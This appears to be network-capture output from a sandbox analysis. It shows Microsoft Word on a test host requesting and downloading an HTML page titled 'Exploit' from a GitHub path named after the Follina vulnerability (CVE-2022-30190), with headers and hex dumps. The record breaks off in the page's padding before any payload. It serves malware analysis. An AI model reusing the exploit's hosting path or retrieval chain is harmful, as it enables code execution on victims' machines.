                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC72INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:09 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6955-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                        X-Timer: S1660787830.535497,VS0,VE0
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 4aa7bf1bd86ec554d4344a3b644d235210eff816
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:09 GMT
                                                                                                                                                                                                                                        Source-Age: 4


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        5192.168.2.449709185.199.109.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC73OUTHEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC73INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:09 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6925-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                        X-Timer: S1660787830.792096,VS0,VE1
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 8f764b5df9319996b8b6c3a33902dda0dd52d219
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:09 GMT
                                                                                                                                                                                                                                        Source-Age: 4


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        6192.168.2.449710185.199.108.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC74OUTOPTIONS /drgreenthumb93/CVE-2022-30190-follina/main/ HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                                                        X-Office-Major-Version: 16
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-FeatureVersion: 1
                                                                                                                                                                                                                                        X-MSGETWEBURL: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC74INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:09 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6950-MXP
                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                        X-Timer: S1660787830.911926,VS0,VE9
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 90f3b6f9be95938ba8c5b82af688f9434fb26d83
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:09 GMT
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding
                                                                                                                                                                                                                                        transfer-encoding: chunked
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC75INData Raw: 34 32 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 42a
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC75INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 0d 0a 0d 0a 48 65 6c 6c 6f 20 66 75 74 75 72 65 20 47 69 74 48 75 62 62 65 72 21 20 49 20 62 65 74 20 79 6f 75 27 72 65 20 68 65 72 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 6f 73 65 20 6e 61 73 74 79 20 69 6e 6c 69 6e 65 20 73 74 79 6c 65 73 2c 0d 0a 44 52 59 20 75 70 20 74 68 65 73 65 20 74 65 6d 70 6c 61 74 65 73 20 61 6e 64 20 6d 61 6b 65 20 27 65 6d 20 6e 69 63 65 20 61 6e 64 20 72 65 2d 75 73 61 62 6c 65 2c 20 72 69 67 68 74 3f 0d 0a 0d 0a 50 6c 65 61 73 65 2c 20 64 6f 6e 27 74 2e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 79 6c 65 67 75 69 64 65 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2e 30 0d 0a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...Hello future GitHubber! I bet you're here to remove those nasty inline styles,DRY up these templates and make 'em nice and re-usable, right?Please, don't. https://github.com/styleguide/templates/2.0--><html> <head>
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC76INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC76INData Raw: 61 62 34 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ab4
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC76INData Raw: 6f 67 6f 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 35 70 78 3b 20 7d 0d 0a 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 32 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 0d 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0d 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 6d 69 6e 2d 2d 6d 6f 7a 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0d 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 2d 6f 2d 6d
                                                                                                                                                                                                                                        Data Ascii: ogo { display: inline-block; margin-top: 35px; } .logo-img-2x { display: none; } @media only screen and (-webkit-min-device-pixel-ratio: 2), only screen and ( min--moz-device-pixel-ratio: 2), only screen and ( -o-m
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC77INData Raw: 4f 46 52 76 45 35 46 75 4f 50 53 34 57 4c 53 74 37 2b 38 61 6a 76 58 63 4a 70 63 79 4e 76 68 7a 74 53 77 55 6b 54 47 67 5a 7a 39 75 44 53 78 52 6e 50 5a 77 73 6e 54 6b 71 79 37 6a 70 73 50 74 2f 41 78 79 76 6e 41 65 4a 4d 41 78 50 6e 4d 69 71 50 4a 59 49 79 7a 66 34 2f 4b 71 72 50 65 64 61 4b 35 62 49 73 51 77 66 54 6f 32 74 37 32 68 55 65 70 50 57 76 6e 36 6d 4f 38 56 6f 58 72 67 62 44 52 61 4a 58 6c 65 36 72 37 35 46 7a 5a 6d 37 53 32 54 6e 79 54 4e 55 58 76 35 65 69 44 41 41 36 6a 30 57 6d 4b 79 57 76 35 31 6c 69 52 41 41 43 6a 50 30 4f 5a 4e 56 75 77 61 34 4c 2b 75 51 41 63 77 2f 53 69 4e 47 48 35 37 6d 49 78 78 50 4b 6d 55 33 44 67 70 4c 32 73 58 33 72 75 74 63 33 2f 76 68 39 67 75 31 44 33 74 4e 45 41 74 76 4f 53 4b 56 41 6d 78 66 61 67 52 6d 62 6e
                                                                                                                                                                                                                                        Data Ascii: OFRvE5FuOPS4WLSt7+8ajvXcJpcyNvhztSwUkTGgZz9uDSxRnPZwsnTkqy7jpsPt/AxyvnAeJMAxPnMiqPJYIyzf4/KqrPedaK5bIsQwfTo2t72hUepPWvn6mO8VoXrgbDRaJXle6r75FzZm7S2TnyTNUXv5eiDAA6j0WmKyWv51liRAACjP0OZNVuwa4L+uQAcw/SiNGH57mIxxPKmU3DgpL2sX3rutc3/vh9gu1D3tNEAtvOSKVAmxfagRmbn
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC78INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC78INData Raw: 61 62 34 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ab4
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC78INData Raw: 4f 4a 77 75 5a 67 39 62 31 6a 66 33 67 51 52 37 72 36 57 31 6b 54 53 63 51 70 46 6a 50 78 4b 4f 77 44 67 41 49 55 7a 79 7a 51 4f 51 52 59 4d 79 64 6b 7a 49 37 59 5a 62 69 64 44 6b 63 54 6b 55 4b 51 57 61 7a 4f 65 69 74 58 46 39 68 42 77 35 53 5a 63 69 5a 4f 69 39 54 36 47 6e 6b 4d 70 30 75 4b 79 6d 51 6b 44 48 48 41 78 7a 4d 4c 77 63 53 4d 2b 65 5a 4a 71 57 68 73 6b 68 4f 4d 69 76 44 44 73 63 49 43 35 6f 68 79 57 2b 78 31 6c 54 6d 35 36 2b 76 32 44 6b 47 47 6c 7a 39 46 53 45 6e 79 6e 52 64 67 50 4b 55 6c 65 7a 54 43 53 54 65 34 7a 47 6e 5a 66 73 56 74 6d 57 54 33 34 6b 6c 6a 41 6d 4a 67 41 62 42 53 45 75 59 79 51 49 6a 4c 6e 67 6e 6b 4c 42 55 67 6b 4a 46 59 36 50 64 62 67 63 4b 61 45 78 54 66 7a 34 38 46 6e 78 61 61 6e 78 38 66 47 70 36 68 6c 59 31 66 76
                                                                                                                                                                                                                                        Data Ascii: OJwuZg9b1jf3gQR7r6W1kTScQpFjPxKOwDgAIUzyzQOQRYMydkzI7YZbidDkcTkUKQWazOeitXF9hBw5SZciZOi9T6GnkMp0uKymQkDHHAxzMLwcSM+eZJqWhskhOMivDDscIC5ohyW+x1lTm56+v2DkGGlz9FSEnynRdgPKUlezTCSTe4zGnZfsVtmWT34kljAmJgAbBSEuYyQIjLngnkLBUgkJFY6PdbgcKaExTfz48Fnxaanx8fGp6hlY1fv
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC80INData Raw: 4c 51 41 67 44 51 31 6c 56 52 37 67 34 6f 63 43 4d 32 65 2b 37 31 46 64 32 4b 66 48 4a 42 34 32 73 76 46 77 7a 70 4b 67 41 7a 45 4e 56 6e 59 52 37 2f 64 62 68 7a 49 79 66 4e 64 61 7a 43 4b 42 30 52 70 37 38 35 4a 41 34 71 39 73 57 4c 39 2b 73 70 4b 69 35 65 68 66 76 52 62 30 63 46 76 72 4b 30 4a 34 75 2b 64 33 70 6d 56 47 52 6c 77 31 73 47 38 70 74 37 61 6b 75 70 67 30 4b 6b 45 5a 73 5a 2f 66 39 45 64 65 61 38 42 68 43 51 79 33 37 69 41 70 43 69 43 52 2f 33 4b 4d 56 31 49 5a 79 64 32 56 2b 73 6c 79 59 6e 34 45 61 30 48 56 35 4d 69 4e 77 61 7a 52 6c 67 53 55 6d 58 42 41 79 34 72 66 56 71 42 34 4c 2b 76 53 49 36 53 38 71 34 43 32 2f 77 61 68 42 4b 2f 4a 79 48 39 2b 2f 4a 62 77 6a 6d 68 55 68 63 34 68 4d 39 4b 54 6b 65 45 64 5a 6f 35 6a 36 70 6a 34 77 77 6b
                                                                                                                                                                                                                                        Data Ascii: LQAgDQ1lVR7g4ocCM2e+71Fd2KfHJB42svFwzpKgAzENVnYR7/dbhzIyfNdazCKB0Rp785JA4q9sWL9+spKi5ehfvRb0cFvrK0J4u+d3pmVGRlw1sG8pt7akupg0KkEZsZ/f9Edea8BhCQy37iApCiCR/3KMV1IZyd2V+slyYn4Ea0HV5MiNwazRlgSUmXBAy4rfVqB4L+vSI6S8q4C2/wahBK/JyH9+/JbwjmhUhc4hM9KTkeEdZo5j6pj4wwk
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC81INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC81INData Raw: 61 62 34 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ab4
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC81INData Raw: 50 36 30 55 2b 49 53 4f 45 67 41 65 41 31 49 38 68 71 75 73 68 76 54 4f 48 45 69 31 59 53 54 67 51 37 37 50 5a 49 34 71 4d 74 58 4f 31 4d 33 2f 36 31 4b 6c 69 4f 30 58 31 69 37 43 55 53 4c 56 6a 4b 32 73 76 61 34 38 51 6f 6a 72 45 6a 57 57 78 49 79 67 37 51 54 67 49 53 51 7a 74 52 6f 76 56 34 6e 43 49 4a 79 54 4a 6a 54 45 4a 4c 4a 39 49 69 62 4e 54 35 32 71 72 6a 4a 50 69 34 49 74 71 6f 66 51 6e 44 4f 73 7a 78 73 38 62 79 43 77 49 63 52 78 35 4a 62 61 53 49 67 6d 47 34 6d 46 50 59 69 53 30 42 6b 56 57 50 48 6e 72 42 4f 75 46 5a 42 36 45 70 4c 37 66 41 44 4b 57 63 78 49 68 76 61 6f 76 49 6f 61 41 78 38 48 44 41 38 4d 49 4a 42 61 52 62 42 57 66 4c 72 61 54 6e 54 52 65 31 48 53 63 66 78 6c 51 65 46 44 68 41 49 37 72 51 49 35 7a 38 77 41 4f 70 43 39 4f 48 48
                                                                                                                                                                                                                                        Data Ascii: P60U+ISOEgAeA1I8hqushvTOHEi1YSTgQ77PZI4qMtXO1M3/61KliO0X1i7CUSLVjK2sva48QojrEjWWxIyg7QTgISQztRovV4nCIJyTJjTEJLJ9IibNT52qrjJPi4ItqofQnDOszxs8byCwIcRx5JbaSIgmG4mFPYiS0BkVWPHnrBOuFZB6EpL7fADKWcxIhvaovIoaAx8HDA8MIJBaRbBWfLraTnTRe1HScfxlQeFDhAI7rQI5z8wAOpC9OHH
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC83INData Raw: 6b 57 49 44 71 52 71 50 42 42 69 45 64 48 4b 71 71 41 79 5a 50 6a 36 50 67 41 42 6b 66 64 61 52 74 79 63 53 48 38 78 67 41 43 4a 66 59 77 77 52 44 44 52 6f 5a 51 74 7a 6e 2f 2b 2b 66 7a 46 69 38 76 4b 68 4b 6c 4d 4a 49 31 4c 4e 4a 7a 49 4b 46 39 74 6c 55 45 46 55 76 66 4f 6d 71 4c 56 71 31 63 45 46 66 37 66 6a 42 30 51 45 30 39 53 6d 55 71 6b 70 41 42 49 43 6e 6f 4c 43 67 70 4f 35 51 55 56 4a 4d 53 4b 39 46 31 62 77 43 61 6b 74 58 35 47 6b 73 69 57 6f 36 74 30 33 55 41 67 57 6f 78 61 71 77 4b 5a 64 48 4b 58 67 4e 77 6e 6a 64 37 2b 53 38 38 77 49 79 49 71 6b 47 4a 78 58 31 78 73 38 43 69 47 78 6e 73 77 50 42 7a 76 76 6a 51 71 5a 57 55 62 4e 6d 79 6f 34 39 71 77 51 57 65 69 50 37 73 42 31 51 6e 48 45 6b 45 46 57 4b 70 72 6f 4f 6f 69 6e 6a 61 76 50 6a 49 69
                                                                                                                                                                                                                                        Data Ascii: kWIDqRqPBBiEdHKqqAyZPj6PgABkfdaRtycSH8xgACJfYwwRDDRoZQtzn/++fzFi8vKhKlMJI1LNJzIKF9tlUEFUvfOmqLVq1cEFf7fjB0QE09SmUqkpABICnoLCgpO5QUVJMSK9F1bwCaktX5GksiWo6t03UAgWoxaqwKZdHKXgNwnjd7+S88wIyIqkGJxX1xs8CiGxnswPBzvvjQqZWUbNmyo49qwQWeiP7sB1QnHEkEFWKproOoinjavPjIi
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC84INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC84INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC84INData Raw: 54 54 4f 4a 38 59 56 6c 5a 4f 2b 2f 49 41 34 70 34 45 6e 76 44 4e 6c 5a 59 2f 55 45 4a 35 6b 48 79 70 45 34 52 45 4a 4e 36 7a 4a 69 4d 4e 63 51 6d 57 45 68 70 71 59 31 37 4c 54 4b 53 32 68 4a 6b 58 57 36 6d 31 69 51 50 50 34 6b 51 59 58 64 64 35 7a 6f 4d 4d 64 50 46 6a 55 30 36 44 7a 63 34 47 54 7a 77 43 45 43 71 39 6e 63 65 32 2b 51 50 76 55 68 41 71 71 4c 57 78 47 75 6b 62 47 2f 62 47 30 4d 75 5a 67 42 42 71 72 57 48 71 68 45 35 5a 4f 30 41 6b 54 45 65 53 4d 4b 67 52 46 4d 68 48 6c 39 2f 66 61 59 77 56 2f 56 64 47 38 72 47 5a 32 41 61 69 2f 4f 71 43 6e 4e 7a 38 52 52 38 46 73 53 66 46 55 59 42 72 56 68 52 59 33 55 6f 45 74 58 73 58 73 62 46 57 2b 2b 78 42 6d 4a 30 47 70 4d 43 50 50 75 31 67 49 6a 4e 56 74 72 56 61 30 4e 63 4a 2b 46 52 45 58 50 7a 77 6a
                                                                                                                                                                                                                                        Data Ascii: TTOJ8YVlZO+/IA4p4EnvDNlZY/UEJ5kHypE4REJN6zJiMNcQmWEhpqY17LTKS2hJkXW6m1iQPP4kQYXdd5zoMMdPFjU06Dzc4GTzwCECq9nce2+QPvUhAqqLWxGukbG/bG0MuZgBBqrWHqhE5ZO0AkTEeSMKgRFMhHl9/faYwV/VdG8rGZ2Aai/OqCnNz8RR8FsSfFUYBrVhRY3UoEtXsXsbFW++xBmJ0GpMCPPu1gIjNVtrVa0NcJ+FREXPzwj
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC85INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:09 UTC85INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        7192.168.2.449711185.199.108.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC85OUTHEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                                                        X-Office-Major-Version: 16
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-FeatureVersion: 1
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC85INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:10 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6956-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                        X-Timer: S1660787830.028214,VS0,VE0
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: c51a7588355283b280daf7ac0379487c3b85e255
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:10 GMT
                                                                                                                                                                                                                                        Source-Age: 4


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        8192.168.2.449712185.199.109.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC86OUTGET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC87INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 8226
                                                                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        ETag: "e354a911960708e3440f84ea636df58339a30e9db3fd96e7dc79f2ba014824d1"
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:51884D:55A9F9:62FD9C75
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:10 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6949-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                        X-Timer: S1660787830.106222,VS0,VE1
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: a1a05a1c6c3bb0edbcde9fa8ea2586b3ac5fee83
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:10 GMT
                                                                                                                                                                                                                                        Source-Age: 1
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC87INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 45 78 70 6c 6f 69 74 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42
                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html lang="en"><head><title>Exploit</title></head><body><script>//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV//BBBBBBBBB
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC89INData Raw: 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
